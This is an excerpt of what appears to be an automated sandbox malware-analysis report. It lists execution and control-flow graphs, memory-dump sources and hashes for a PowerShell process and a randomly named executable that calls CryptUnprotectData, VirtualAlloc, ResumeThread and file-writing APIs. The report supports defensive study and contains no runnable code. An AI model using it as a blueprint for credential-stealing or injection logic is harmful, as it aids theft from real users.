                                                                                                                                                                    • Instruction ID: 679591852f414d2dc5f1fcf1e428a41e2eb3bc158556fabdec95d9ea09c466d1
                                                                                                                                                                    • Opcode Fuzzy Hash: 48da377cfb43f58dc8467bd0170170a0e922031bb2597457e1ba3db9cb23ea2d
                                                                                                                                                                    • Instruction Fuzzy Hash: 8C41367140EBC44FE756CB28D8959523FF0EF52320B1A06DFD088CB1B3D625A846C7A2
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000008.00000002.2672776835.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b890000_powershell.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000008.00000002.2672776835.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b890000_powershell.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: M_^6$M_^<$M_^F$M_^I$M_^J
                                                                                                                                                                    • API String ID: 0-1500707516
                                                                                                                                                                    • Opcode ID: 041ac91ce1e2f866d46e9f53b52ae62d15ede3fa734e511d0ac2dfddc52e60c4
                                                                                                                                                                    • Instruction ID: 698a88e157f5e3be547aa0b9edad8586613dc3d8c9d577c9a4451944f3587467
                                                                                                                                                                    • Opcode Fuzzy Hash: 041ac91ce1e2f866d46e9f53b52ae62d15ede3fa734e511d0ac2dfddc52e60c4
                                                                                                                                                                    • Instruction Fuzzy Hash: DF21F6A7704466DED30A76ADBC189DC7380DB9427A38947F3E169CB583FD14A08746C0
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000008.00000002.2672776835.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b890000_powershell.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: M_^$M_^$M_^$M_^
                                                                                                                                                                    • API String ID: 0-1397233021
                                                                                                                                                                    • Opcode ID: 8290be27e745bd22f8594c4da34fe86a7ad81ec82dc56f9857c7d78c573c957c
                                                                                                                                                                    • Instruction ID: 37b81bfd84a26cf515a8a2bea6ef506d8cadddf451accf18210f7796012d23ab
                                                                                                                                                                    • Opcode Fuzzy Hash: 8290be27e745bd22f8594c4da34fe86a7ad81ec82dc56f9857c7d78c573c957c
                                                                                                                                                                    • Instruction Fuzzy Hash: 88319EA3B0FAC75BEB5A472948790997FE0FF6679874A43F6C0D48B0A3FD1568074242

                                                                                                                                                                    Execution Graph

                                                                                                                                                                    Execution Coverage:14.2%
                                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                    Signature Coverage:12.1%
                                                                                                                                                                    Total number of Nodes:33
                                                                                                                                                                    Total number of Limit Nodes:1
                                                                                                                                                                    execution_graph 28420 7ffd9b8ad2f5 28421 7ffd9b8ad36b WriteFile 28420->28421 28423 7ffd9b8ad48f 28421->28423 28424 7ffd9b8af0f5 28425 7ffd9b8af11f VirtualAlloc 28424->28425 28427 7ffd9b8af23f 28425->28427 28403 7ffd9b8ad04a 28404 7ffd9b8ad059 CreateFileTransactedW 28403->28404 28406 7ffd9b8ad268 28404->28406 28432 7ffd9b8ae6da 28435 7ffd9b8ae6eb 28432->28435 28433 7ffd9b8ae815 28439 7ffd9b8aec5a GetSystemInfo 28433->28439 28435->28433 28436 7ffd9b8ae822 28435->28436 28440 7ffd9b8aec5a GetSystemInfo 28436->28440 28438 7ffd9b8ae820 28439->28438 28440->28438 28407 7ffd9b8ab57d 28408 7ffd9b9116a0 28407->28408 28411 7ffd9b9107d0 28408->28411 28410 7ffd9b911789 28412 7ffd9b9107db 28411->28412 28414 7ffd9b91087e 28412->28414 28415 7ffd9b910897 28412->28415 28414->28410 28416 7ffd9b9108a2 28415->28416 28417 7ffd9b9108ea ResumeThread 28415->28417 28416->28414 28419 7ffd9b9109b4 28417->28419 28419->28414 28399 7ffd9bfb367e 28400 7ffd9bfb369a 28399->28400 28401 7ffd9bfb37a1 CryptUnprotectData 28400->28401 28402 7ffd9bfb38af 28401->28402 28428 7ffd9b8aec91 28429 7ffd9b8aec9e GetSystemInfo 28428->28429 28431 7ffd9b8aed85 28429->28431

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 1219 7ffd9bfb367e-7ffd9bfb36af 1222 7ffd9bfb370f-7ffd9bfb3739 1219->1222 1223 7ffd9bfb36b1-7ffd9bfb370e call 7ffd9bfb2190 1219->1223 1231 7ffd9bfb373b 1222->1231 1232 7ffd9bfb373c-7ffd9bfb374d 1222->1232 1223->1222 1231->1232 1234 7ffd9bfb374f 1232->1234 1235 7ffd9bfb3750-7ffd9bfb38ad CryptUnprotectData 1232->1235 1234->1235 1238 7ffd9bfb38b5-7ffd9bfb3927 1235->1238 1239 7ffd9bfb38af 1235->1239 1239->1238
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000010.00000002.3104521405.00007FFD9BFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFB0000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_16_2_7ffd9bfb0000_wnWNWNYIxJtFiUSDRXunzX.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CryptDataUnprotect
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 834300711-0
                                                                                                                                                                    • Opcode ID: 342680f2546a522dcdcc6e9af10500ac6cfde5bb71f4ae5813e7374b545142f8
                                                                                                                                                                    • Instruction ID: be2ff814b8c6feeaca96509f1215c1569d973810c561f342d905622b26c6dc1e
                                                                                                                                                                    • Opcode Fuzzy Hash: 342680f2546a522dcdcc6e9af10500ac6cfde5bb71f4ae5813e7374b545142f8
                                                                                                                                                                    • Instruction Fuzzy Hash: 68919170A08A5C8FDB98EF68C855BA9BBF1FF59310F1041AED04DD3292DA35A985CF41

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000010.00000002.3072198419.00007FFD9BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA70000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_16_2_7ffd9ba70000_wnWNWNYIxJtFiUSDRXunzX.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: a/_L
                                                                                                                                                                    • API String ID: 0-3548775047
                                                                                                                                                                    • Opcode ID: ca22fb73f6574c1e5bb0eae1ebaa86f88c696e7779ccc1e7e072ebdf9930016b
                                                                                                                                                                    • Instruction ID: 3f869f5b65d04c919e6a429a575aed7ef1a087347d8cb6aeefafa87eae87692a
                                                                                                                                                                    • Opcode Fuzzy Hash: ca22fb73f6574c1e5bb0eae1ebaa86f88c696e7779ccc1e7e072ebdf9930016b
                                                                                                                                                                    • Instruction Fuzzy Hash: C4329630B1DA1D8FDBA8DB58C8A5A7977E1FF54314F5141B9D00EC72A2EE68AD41CB80

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 1331 7ffd9b8ad04a-7ffd9b8ad057 1332 7ffd9b8ad059-7ffd9b8ad061 1331->1332 1333 7ffd9b8ad062-7ffd9b8ad128 1331->1333 1332->1333 1337 7ffd9b8ad12a-7ffd9b8ad141 1333->1337 1338 7ffd9b8ad144-7ffd9b8ad266 CreateFileTransactedW 1333->1338 1337->1338 1339 7ffd9b8ad268 1338->1339 1340 7ffd9b8ad26e-7ffd9b8ad2f0 1338->1340 1339->1340
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000010.00000002.3064756180.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_16_2_7ffd9b8a0000_wnWNWNYIxJtFiUSDRXunzX.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateFileTransacted
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2149338676-0
                                                                                                                                                                    • Opcode ID: 51f9dcfe1cb56373039c5a76da65090abbeea94f52533d81801c3cc0fc4693ad
                                                                                                                                                                    • Instruction ID: 34a34e2340a4c91d6b9944455931291424572b7ffa6e61900595fce71dd17054
                                                                                                                                                                    • Opcode Fuzzy Hash: 51f9dcfe1cb56373039c5a76da65090abbeea94f52533d81801c3cc0fc4693ad
                                                                                                                                                                    • Instruction Fuzzy Hash: 5E912370908A5D8FDB99DF58C894BE9BBF1FB6A310F1041AED04DE3291DB75A984CB04

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 1343 7ffd9b8ad2f5-7ffd9b8ad3c2 1346 7ffd9b8ad3ea-7ffd9b8ad48d WriteFile 1343->1346 1347 7ffd9b8ad3c4-7ffd9b8ad3e7 1343->1347 1348 7ffd9b8ad495-7ffd9b8ad4f1 1346->1348 1349 7ffd9b8ad48f 1346->1349 1347->1346 1349->1348
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000010.00000002.3064756180.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_16_2_7ffd9b8a0000_wnWNWNYIxJtFiUSDRXunzX.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FileWrite
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3934441357-0
                                                                                                                                                                    • Opcode ID: c56ae549459ce3e2b1815b7d756ad4806908cae348920010eb958373ffbdab54
                                                                                                                                                                    • Instruction ID: 683446c97eb5fd3841a47725559ad015738361241fdce7333934ec30730d8db8
                                                                                                                                                                    • Opcode Fuzzy Hash: c56ae549459ce3e2b1815b7d756ad4806908cae348920010eb958373ffbdab54
                                                                                                                                                                    • Instruction Fuzzy Hash: 49610374A08A5C8FDB98DF58C895BE9BBF1FB69310F1041AED04DE3291DB74A985CB40

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 1351 7ffd9b8aec5a-7ffd9b8aec63 1352 7ffd9b8aec65-7ffd9b8aec83 1351->1352 1353 7ffd9b8aecad 1351->1353 1357 7ffd9b8aec85-7ffd9b8aec8f 1352->1357 1358 7ffd9b8aec9e-7ffd9b8aecaa 1352->1358 1355 7ffd9b8aecaf 1353->1355 1356 7ffd9b8aecb0-7ffd9b8aed1a 1353->1356 1355->1356 1361 7ffd9b8aed22-7ffd9b8aed83 GetSystemInfo 1356->1361 1358->1353 1362 7ffd9b8aed85 1361->1362 1363 7ffd9b8aed8b-7ffd9b8aedbb 1361->1363 1362->1363
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000010.00000002.3064756180.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_16_2_7ffd9b8a0000_wnWNWNYIxJtFiUSDRXunzX.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: InfoSystem
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 31276548-0
                                                                                                                                                                    • Opcode ID: 258edfdb390cac67b2e71008379273879423800e31acd8ee226d0d3d966a55f8
                                                                                                                                                                    • Instruction ID: 2cfcf7829a2b7c183c00a1340122f1622910312fc4e1725899c98983855201de
                                                                                                                                                                    • Opcode Fuzzy Hash: 258edfdb390cac67b2e71008379273879423800e31acd8ee226d0d3d966a55f8
                                                                                                                                                                    • Instruction Fuzzy Hash: F151D030909A4C8FDB69DFA8D859AE9BBF0FF59310F1041AFD04DD72A2DA346946CB50

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 1366 7ffd9b910897-7ffd9b9108a0 1367 7ffd9b9108a2-7ffd9b9108c2 1366->1367 1368 7ffd9b9108ea-7ffd9b9109b2 ResumeThread 1366->1368 1372 7ffd9b9109b4 1368->1372 1373 7ffd9b9109ba-7ffd9b910a04 1368->1373 1372->1373
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000010.00000002.3064756180.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_16_2_7ffd9b8a0000_wnWNWNYIxJtFiUSDRXunzX.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ResumeThread
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 947044025-0
                                                                                                                                                                    • Opcode ID: 5846616992e05bb2f062cd015ce8d56601ba442f5cb012b67dbdd7f760c86065
                                                                                                                                                                    • Instruction ID: c6c1cfd22f0fa43a73d2a3054267c2acf4ec0918ba051ffd35274041c1ea2f5e
                                                                                                                                                                    • Opcode Fuzzy Hash: 5846616992e05bb2f062cd015ce8d56601ba442f5cb012b67dbdd7f760c86065
                                                                                                                                                                    • Instruction Fuzzy Hash: 63413970E0860C8FDB58EFA8D895AEDBBF0FB59310F10416AD40DE7252DA75A946CB40

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 1376 7ffd9b8aec91-7ffd9b8aecad 1379 7ffd9b8aecaf 1376->1379 1380 7ffd9b8aecb0-7ffd9b8aed83 GetSystemInfo 1376->1380 1379->1380 1384 7ffd9b8aed85 1380->1384 1385 7ffd9b8aed8b-7ffd9b8aedbb 1380->1385 1384->1385
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000010.00000002.3064756180.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_16_2_7ffd9b8a0000_wnWNWNYIxJtFiUSDRXunzX.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: InfoSystem
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 31276548-0
                                                                                                                                                                    • Opcode ID: c6b79f5963bc47b9f446560d909979aad70c3d4d96693d4a433fe1edcfa42bbd
                                                                                                                                                                    • Instruction ID: 5fe6287d2e9554bf0255824711157d39954a19eae1a0a4692b80c5a9a1b78c48
                                                                                                                                                                    • Opcode Fuzzy Hash: c6b79f5963bc47b9f446560d909979aad70c3d4d96693d4a433fe1edcfa42bbd
                                                                                                                                                                    • Instruction Fuzzy Hash: 1041AE7090C68C8FDB99DFA8D859BE9BBF0EF5A310F1441ABD04DD72A2CA345946CB10

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 1388 7ffd9be300c5-7ffd9be300d9 1390 7ffd9be3011e 1388->1390 1391 7ffd9be300db-7ffd9be300fe 1388->1391 1392 7ffd9be30121-7ffd9be30136 1390->1392 1396 7ffd9be30100-7ffd9be30106 1391->1396 1397 7ffd9be30113-7ffd9be30116 1391->1397 1399 7ffd9be30137-7ffd9be30149 1392->1399 1401 7ffd9be3011a-7ffd9be3011d 1396->1401 1402 7ffd9be30108-7ffd9be3010e 1396->1402 1397->1401 1404 7ffd9be3018e-7ffd9be3019a 1399->1404 1405 7ffd9be3014b-7ffd9be30166 1399->1405 1401->1390 1402->1392 1407 7ffd9be30110 1402->1407 1404->1399 1408 7ffd9be3019c-7ffd9be30378 1404->1408 1405->1404 1407->1397 1415 7ffd9be303d5-7ffd9be303d9 1408->1415 1419 7ffd9be3038d 1415->1419 1420 7ffd9be30398-7ffd9be303db 1419->1420 1425 7ffd9be303c1-7ffd9be303e6 1420->1425 1426 7ffd9be303e8-7ffd9be303ea 1420->1426 1428 7ffd9be303cc 1426->1428 1429 7ffd9be303ec-7ffd9be303f1 1428->1429 1434 7ffd9be303ce-7ffd9be303d4 1429->1434 1434->1415
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000010.00000002.3093822961.00007FFD9BE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE30000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_16_2_7ffd9be30000_wnWNWNYIxJtFiUSDRXunzX.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: ^
                                                                                                                                                                    • API String ID: 0-1590793086
                                                                                                                                                                    • Opcode ID: b1b6d7a99e1010a39de2a8e7e4d61e7e5ba7587567e9ce25ad8dd0652c21543f
                                                                                                                                                                    • Instruction ID: 7e2a709bfc6491c9914481be51967124a5398d8fc15409d8ad86d480c870f0f3
                                                                                                                                                                    • Opcode Fuzzy Hash: b1b6d7a99e1010a39de2a8e7e4d61e7e5ba7587567e9ce25ad8dd0652c21543f
                                                                                                                                                                    • Instruction Fuzzy Hash: 7441F553F0E06B86F239B6EC38716FC9744DF40BA6B090277D05D860E79C4A7E4252D6
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000010.00000002.3093822961.00007FFD9BE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE30000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_16_2_7ffd9be30000_wnWNWNYIxJtFiUSDRXunzX.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: H
                                                                                                                                                                    • API String ID: 0-2852464175
                                                                                                                                                                    • Opcode ID: b2133543a0b565c0b33ce9ec245d041a35adfe5202190892e5049e5ddeaf62ac
                                                                                                                                                                    • Instruction ID: 1eafaf2a500d054290ce31b980c7e2e12f71aeafea3801409e4bf6fe22b59e05
                                                                                                                                                                    • Opcode Fuzzy Hash: b2133543a0b565c0b33ce9ec245d041a35adfe5202190892e5049e5ddeaf62ac
                                                                                                                                                                    • Instruction Fuzzy Hash: 44813B31B0E64A4FE7789B68947957977E8EF85310F15057ED08FC31A2DF2AB9028741
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000010.00000002.3064756180.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_16_2_7ffd9b8a0000_wnWNWNYIxJtFiUSDRXunzX.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 4275171209-0
                                                                                                                                                                    • Opcode ID: 655762fddd58db17d4abc150bae984e7cfe9a0a27339c96c1219034da96001ce
                                                                                                                                                                    • Instruction ID: 2123562f71307801efeb0ed25ed491f699c60835bede73b3c859f3c817d6aac4
                                                                                                                                                                    • Opcode Fuzzy Hash: 655762fddd58db17d4abc150bae984e7cfe9a0a27339c96c1219034da96001ce
                                                                                                                                                                    • Instruction Fuzzy Hash: 17513970908A5C8FDF98DF58D895BE9BBF0FB69310F1042AAD04DE3251DB70A981CB81
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 2b6ecc6e64f5ca6ca8776a843b487c7af9f2df1081757ecedf460a3fb2c45e0b
                                                                                                                                                                    • Instruction ID: 2f872e97125eaecf76919b9dcb45ec46252cafc5275b5cd7ac6a72363417d843
                                                                                                                                                                    • Opcode Fuzzy Hash: 2b6ecc6e64f5ca6ca8776a843b487c7af9f2df1081757ecedf460a3fb2c45e0b
                                                                                                                                                                    • Instruction Fuzzy Hash: F1C1E430A1D54A8BEB2DCF48C0E05B537A5FF45308B6545BDD84B8B6ABDA78F542CB40
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000010.00000002.3093822961.00007FFD9BE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE30000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_16_2_7ffd9be30000_wnWNWNYIxJtFiUSDRXunzX.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 20917c0faacfcd57c2baa26f129e187e3641b9c493042aaa7418bbb845d09dee
                                                                                                                                                                    • Instruction ID: 92b9ef3d15c410cf8fdfd1b1dc9145f8fae37c1338ed12e3e1cf524d3734e435
                                                                                                                                                                    • Opcode Fuzzy Hash: 20917c0faacfcd57c2baa26f129e187e3641b9c493042aaa7418bbb845d09dee
                                                                                                                                                                    • Instruction Fuzzy Hash: 6C31EB52F0F1AB86F37862EA24718F877449F15620F1A017BC04D860E6FC0E6E45539B
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000010.00000002.3072198419.00007FFD9BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA70000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_16_2_7ffd9ba70000_wnWNWNYIxJtFiUSDRXunzX.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 736268ce46f22b69854123841c7cc126cb71b64988ce1b9286b5fc892733110a
                                                                                                                                                                    • Instruction ID: 8faeada915042f283aaa4bec996f825f9ff6f071176aaea6b7a4806e78e79c73
                                                                                                                                                                    • Opcode Fuzzy Hash: 736268ce46f22b69854123841c7cc126cb71b64988ce1b9286b5fc892733110a
                                                                                                                                                                    • Instruction Fuzzy Hash: C4B1E030B0EA4A8FE358DF58C4B06B4B7A1FF54304F5541B9C04EC7AA6CBA8B951CB80
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000010.00000002.3093822961.00007FFD9BE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE30000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_16_2_7ffd9be30000_wnWNWNYIxJtFiUSDRXunzX.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 9a0e570a5022a243c5fb9e23cf31f017ef0c0d3f334b5aee6cf4762da723cf96
                                                                                                                                                                    • Instruction ID: b88d5a549e0934587b199c6d596d484c7be3de51b350ff244e0674ae135d014d
                                                                                                                                                                    • Opcode Fuzzy Hash: 9a0e570a5022a243c5fb9e23cf31f017ef0c0d3f334b5aee6cf4762da723cf96
                                                                                                                                                                    • Instruction Fuzzy Hash: F0B10430B0994E9FE359DF68C0A06B8B7A5FF44300F555179D04EC7A96DB3AB991CB80
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000010.00000002.3072198419.00007FFD9BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA70000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_16_2_7ffd9ba70000_wnWNWNYIxJtFiUSDRXunzX.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 9dd13562c705d8af0e6f7ec793e6b4654126620128cd870e2cc28271bac2c9f9
                                                                                                                                                                    • Instruction ID: db9eae2718dce0db0a7db0b50b888b2ce08aabf2ca3732e1660989ed63e2e264
                                                                                                                                                                    • Opcode Fuzzy Hash: 9dd13562c705d8af0e6f7ec793e6b4654126620128cd870e2cc28271bac2c9f9
                                                                                                                                                                    • Instruction Fuzzy Hash: FDB1E370B0D94A8FE759DF68C0A06B4B7A0FF58304F554179D08EC7AA6DB78B951CB80
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000010.00000002.3072198419.00007FFD9BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA70000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_16_2_7ffd9ba70000_wnWNWNYIxJtFiUSDRXunzX.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: f6e7fbd46b29ee1c55a1c7bb868643a006b03f0f659e566d04797ec4160b075b
                                                                                                                                                                    • Instruction ID: 8ac470a26d12a9753ea9f6709871b11973e498530f1495d99e7303596521b892
                                                                                                                                                                    • Opcode Fuzzy Hash: f6e7fbd46b29ee1c55a1c7bb868643a006b03f0f659e566d04797ec4160b075b
                                                                                                                                                                    • Instruction Fuzzy Hash: EC31D892F0E19E8AF33467A954F54F8B790DF58318F5A01FBD14E870E2DC9C26456382
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000010.00000002.3093822961.00007FFD9BE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE30000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_16_2_7ffd9be30000_wnWNWNYIxJtFiUSDRXunzX.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: f7ba011ee49a77bfbc8dc686b8792489a7b8fe39f90d4cb1ac8243afe52e8cf2
                                                                                                                                                                    • Instruction ID: 50cc147b08e85e8ddb4f1bdf767008bd99c2151ba0acd8f08649aec8e1fe0996
                                                                                                                                                                    • Opcode Fuzzy Hash: f7ba011ee49a77bfbc8dc686b8792489a7b8fe39f90d4cb1ac8243afe52e8cf2
                                                                                                                                                                    • Instruction Fuzzy Hash: 1121E553F0F19B8BF339A6A828756FC5B449F50A62F1A02B7C09DC60E3DC4A3E455286
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000010.00000002.3072198419.00007FFD9BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA70000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_16_2_7ffd9ba70000_wnWNWNYIxJtFiUSDRXunzX.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: ce60b7c45d8a5dd905e778b1a1ec5ade0448a00b313ed78a731ebe88497e5faf
                                                                                                                                                                    • Instruction ID: c0b41af3cae0a9d32d92f077184c16b1af7166e5623d66fc831af1f66a85140f
                                                                                                                                                                    • Opcode Fuzzy Hash: ce60b7c45d8a5dd905e778b1a1ec5ade0448a00b313ed78a731ebe88497e5faf
                                                                                                                                                                    • Instruction Fuzzy Hash: 97B1B070A1A6058FEB59CF48C4E05B137A1FF49314B9541BDC85B8B69BDB78F982CB80
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000010.00000002.3093822961.00007FFD9BE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE30000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_16_2_7ffd9be30000_wnWNWNYIxJtFiUSDRXunzX.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 5a709bc22ac05b5794c2b6898b2f2bc2bf7b7dc011b69429cf463687d5c9f2b3
                                                                                                                                                                    • Instruction ID: 9c673191027574a618774bde0a26b2dfb2e7bb2969e073c35924487a8b851fab
